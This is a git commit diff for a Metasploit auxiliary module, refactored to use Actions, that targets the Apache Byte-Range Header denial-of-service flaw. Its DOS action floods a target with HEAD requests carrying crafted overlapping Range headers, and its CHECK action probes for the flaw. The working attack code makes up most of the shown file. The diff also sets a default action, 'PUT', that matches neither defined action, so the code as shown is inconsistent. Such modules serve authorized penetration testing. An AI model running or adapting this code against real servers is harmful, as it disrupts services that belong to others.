Uses "ACTIONS" keys instead of datastore options

It's better to use ACTIONS instead of datastore in this case. Also,
did some cleanup.
unstable
sinn3r 2013-04-22 15:41:47 -05:00
parent 1714fa21b1
commit 7e28a4ddb0
1 changed files with 35 additions and 34 deletions

View File

@ -1,7 +1,3 @@
##
# $Id$
##
## ##
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
@ -35,7 +31,12 @@ class Metasploit3 < Msf::Auxiliary
'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability 'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Version' => '$Revision$', 'Actions' =>
[
['DOS'],
['CHECK']
],
'DefaultAction' => 'PUT',
'References' => 'References' =>
[ [
[ 'BID', '49303'], [ 'BID', '49303'],
@ -43,43 +44,44 @@ class Metasploit3 < Msf::Auxiliary
[ 'EDB', '17696'], [ 'EDB', '17696'],
[ 'OSVDB', '74721' ], [ 'OSVDB', '74721' ],
], ],
'DisclosureDate' => 'Aug 19 2011', 'DisclosureDate' => 'Aug 19 2011'
)) ))
register_options( register_options(
[ [
Opt::RPORT(80), Opt::RPORT(80),
OptString.new('URI', [ true, "The request URI", '/']), OptString.new('URI', [ true, "The request URI", '/']),
OptInt.new('RLIMIT', [ true, "Number of requests to send",50]), OptInt.new('RLIMIT', [ true, "Number of requests to send",50])
OptEnum.new('ACTION', [true, "DOS or CHECK", "DOS",["DOS","CHECK"]])
], self.class) ], self.class)
end end
def run_host(ip) def run_host(ip)
case datastore['action'] case action.name
when 'DOS'
conduct_dos()
when 'DOS' when 'CHECK'
conduct_dos() check_for_dos()
when 'CHECK'
check_for_dos()
end end
end end
def check_for_dos() def check_for_dos()
path = datastore['URI'] path = datastore['URI']
begin begin
res = send_request_cgi({ res = send_request_cgi({
'uri' => path, 'uri' => path,
'method' => 'HEAD', 'method' => 'HEAD',
'headers' => { "HOST" => "Localhost", "Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"} }) 'headers' => {
"HOST" => "Localhost",
if (res and res.code == 206) "Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"
print_status("Response was #{res.code}") }
print_status("Found Byte-Range Header DOS at #{path}") })
if (res and res.code == 206)
print_status("Response was #{res.code}")
print_status("Found Byte-Range Header DOS at #{path}")
report_note( report_note(
:host => rhost, :host => rhost,
@ -87,16 +89,13 @@ class Metasploit3 < Msf::Auxiliary
:data => "Apache Byte-Range DOS at #{path}" :data => "Apache Byte-Range DOS at #{path}"
) )
else else
print_status("#{rhost} doesn't seem to be vulnerable at #{path}") print_status("#{rhost} doesn't seem to be vulnerable at #{path}")
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE rescue ::Timeout::Error, ::Errno::EPIPE
end end
end end
@ -111,10 +110,12 @@ class Metasploit3 < Msf::Auxiliary
begin begin
print_status("Sending DoS packet #{x} to #{rhost}:#{rport}") print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
res = send_request_cgi({ res = send_request_cgi({
'uri' => uri, 'uri' => uri,
'method' => 'HEAD', 'method' => 'HEAD',
'headers' => { "HOST" => rhost, 'headers' => {
"Range" => "bytes=0-#{ranges}"}},1) "HOST" => rhost,
"Range" => "bytes=0-#{ranges}"}},1)
rescue ::Rex::ConnectionRefused rescue ::Rex::ConnectionRefused
print_status("Unable to connect to #{rhost}:#{rport}.") print_status("Unable to connect to #{rhost}:#{rport}.")
rescue ::Errno::ECONNRESET rescue ::Errno::ECONNRESET